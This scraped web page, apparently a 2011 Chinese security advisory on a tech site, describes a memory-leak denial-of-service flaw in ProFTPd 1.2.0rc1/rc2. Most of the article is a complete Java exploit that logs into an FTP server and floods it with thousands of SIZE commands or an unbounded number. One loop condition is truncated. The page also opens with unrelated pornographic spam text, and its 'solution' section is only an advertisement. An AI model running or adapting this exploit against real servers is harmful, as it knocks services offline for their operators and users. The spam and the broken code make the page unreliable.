自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

<legend id="nf9o5"></legend>

<sub id="nf9o5"><p id="nf9o5"><li id="nf9o5"></li></p></sub>

^{<blockquote id="nf9o5"></blockquote>}

AI.x社區(qū)

軟考社區(qū)

免費(fèi)課

企業(yè)培訓(xùn)

鴻蒙開發(fā)者社區(qū)

WOT技術(shù)大會

公眾號矩陣

移動端

視頻課免費(fèi)課排行榜短視頻直播課軟考學(xué)堂

全部課程軟考華為認(rèn)證廠商認(rèn)證 IT技術(shù)PMP項(xiàng)目管理免費(fèi)題庫

在線學(xué)習(xí)

文章資源問答課堂專欄直播

51CTO

鴻蒙開發(fā)者社區(qū)

51CTO技術(shù)棧

51CTO官微

51CTO學(xué)堂

51CTO博客

CTO訓(xùn)練營

鴻蒙開發(fā)者社區(qū)訂閱號

51CTO軟考

51CTO學(xué)堂APP

51CTO學(xué)堂企業(yè)版APP

鴻蒙開發(fā)者社區(qū)視頻號

51CTO軟考題庫

賬號設(shè)置退出

ProFTPd 遠(yuǎn)程拒絕服務(wù)漏洞

作者：chendy 2011-03-03 11:26:09

運(yùn)維系統(tǒng)運(yùn)維

ProFTPd 遠(yuǎn)程拒絕服務(wù)漏洞：ProFTPd 是一款非常流行的 FTP 服務(wù)器，但是發(fā)現(xiàn)它存在一個安全漏洞，允許惡意用戶對它進(jìn)行拒絕服務(wù)攻擊。本文講述的是ProFTPd 遠(yuǎn)程拒絕服務(wù)漏洞。

　　ProFTPd 遠(yuǎn)程拒絕服務(wù)漏洞 (APP,缺陷) ：當(dāng) ProFTPd 執(zhí)行 SIZE FTP 命令時會引起內(nèi)存泄露漏洞。如果發(fā)送更多的SIZE 命令將引起拒絕服務(wù)攻擊。以下是詳細(xì)內(nèi)容。

　　涉及程序：

　　ProFTPd

　　描述：

　　ProFTPd 內(nèi)存泄露引起拒絕服務(wù)攻擊

　　詳細(xì)：

　　ProFTPd 是一款非常流行的 FTP 服務(wù)器。發(fā)現(xiàn)它存在一個安全漏洞，允許惡意用戶對它進(jìn)行拒絕服務(wù)攻擊。

　　當(dāng) ProFTPd 執(zhí)行 SIZE FTP 命令時會引起內(nèi)存泄露漏洞，如果發(fā)送大約5000次 SIZE FTP 命令到服務(wù)器中可能引起 ProFTPd 耗費(fèi)超過300KB的內(nèi)存。如果發(fā)送更多的SIZE 命令將引起拒絕服務(wù)攻擊。

　　以下代碼僅僅用來測試和研究這個漏洞，如果您將其用于不正當(dāng)?shù)耐緩秸埡蠊载?fù)

　　*/  
 
　　import java.net.*;  
 
　　import java.io.*;  
 
　　class TCPconnection {  
 
　　public TCPconnection (String hostname, int portnumber) throws Exception {  
 
　　Socket s = doaSocket(hostname, portnumber);  
 
　　br = new BufferedReader (new InputStreamReader (s.getInputStream()));  
 
　　ps = new PrintStream (s.getOutputStream());  
 
　　}  
 
　　public String readLine() throws Exception {  
 
　　String s;  
 
　　try { s = br.readLine(); }  
 
　　catch (IOException ioe) {  
 
　　System.out.println("TCP Error ... it's a little hax0r exception ;-)");  
 
　　throw new Exception ("\nInput Error: I/O Error");  
 
　　}  
 
　　return s;  
 
　　}  
 
　　public void println(String s) {  
 
　　ps.println(s);  
 
　　}  
 
　　private Socket doaSocket(String hostname, int portnumber) throws Exception {  
 
　　Socket s = null;  
 
　　int attempts = 0;  
 
　　while (s == null && attempts   
 
　　try { s = new Socket(hostname, portnumber); }  
 
　　catch (UnknownHostException uhe) {  
 
　　System.err.println("It was no posible to establish the TCP connection.\n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");  
 
　　throw new Exception("\nConnection Error: " + "unknown hostname");  
 
　　}  
 
　　catch (IOException ioe) {  
 
　　System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");  
 
　　}  
 
　　attempts++;  
 
　　}  
 
　　if (s == null) throw new IOException("\nThe connection was not accomplished due to an I/O Error: trying it again ...");  
 
　　else return s; }  
 
　　private final int maxattempts = 5;  
 
　　private BufferedReader br;  
 
　　private PrintStream ps;  
 
　　}  
 
　　class proftpDoS {  
 
　　public static void main(String[] arg) throws Exception {  
 
　　InputStreamReader isr;  
 
　　BufferedReader tcld;  
 
　　String hostnamez, username, password, file, s1, option;  
 
　　int i, j, k;  
 
　　isr = new InputStreamReader(System.in);  
 
　　tcld = new BufferedReader(isr);  
 
　　System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");  
 
　　System.out.println("Code in an attempt to solve Fermat Last's Theoreme");  
 
　　hostnamez = "";  
 
　　while (hostnamez.length()==0) {  
 
　　System.out.print("Please enter the hostname/IP: ");  
 
　　hostnamez = tcld.readLine(); }  
 
　　username = "";  
 
　　while (username.length()==0) {  
 
　　System.out.print("Enter the username: ");  
 
　　username = tcld.readLine(); }  
 
　　password = "";  
 
　　while (password.length()==0) {  
 
　　System.out.print("Enter the password for that username: ");  
 
　　password = tcld.readLine(); }  
 
　　file = "";  
 
　　while (file.length()==0) {  
 
　　System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");  
 
　　file = tcld.readLine(); }  
 
　　System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");  
 
　　System.out.println("1) Request 10000 size's to the server (it may be enough)");  
 
　　System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");  
 
　　System.out.print("Option: ");  
 
　　option = tcld.readLine();  
 
　　k = Integer.parseInt(option);  
 
　　while (!(k==1 || k==2)) {  
 
　　System.out.print("Option not valid, please try again: ");  
 
　　option = tcld.readLine();  
 
　　k = Integer.parseInt(option); }  
 
　　TCPconnection tc = new TCPconnection(hostnamez, 21);  
 
　　tc.println("user " + username);  
 
　　tc.println("pass " + password);  
 
　　if (k==1) {  
 
　　for(i=0;i<10000;i++)  
 
　　tc.println("size " + file); }  
 
　　else if (k==2) {  
 
　　for(i=1;i<100;i++)  
 
　　for(j=2;j<((int)Math.pow(j,i ));j++)  
 
　　tc.println("size " + file); }  
 
　　tc.println("quit");  
 
　　s1 = tc.readLine();  
 
　　while (s1!=null) {  
 
　　s1 = tc.readLine();  
 
　　System.out.println("Attack completed ... as one of my friends says:");  
 
　　System.out.println("Hack just r0cks ;-)");  
 
　　}  
 
　　}  
 
　　}

　　受影響的系統(tǒng)：

　　ProFTPd 1.2.0rc1

　　ProFTPd 1.2.0rc2

　　解決方案：

　　CNNS 為您提供完善的網(wǎng)絡(luò)安全服務(wù)。

【編輯推薦】

Proftpd 建表
Proftpd的結(jié)構(gòu)
Proftpd常用參數(shù)說明
Proftpd配置之本地用戶

責(zé)任編輯：zhaolei 來源： CSDN

點(diǎn)贊

51CTO技術(shù)棧公眾號

業(yè)務(wù)
速覽

媒體

51CTO CIOAge HC3i

社區(qū)

51CTO博客鴻蒙開發(fā)者社區(qū) AI.x社區(qū)

教育

51CTO學(xué)堂精培企業(yè)培訓(xùn) CTO訓(xùn)練營

<cite id="mbdx8"></cite>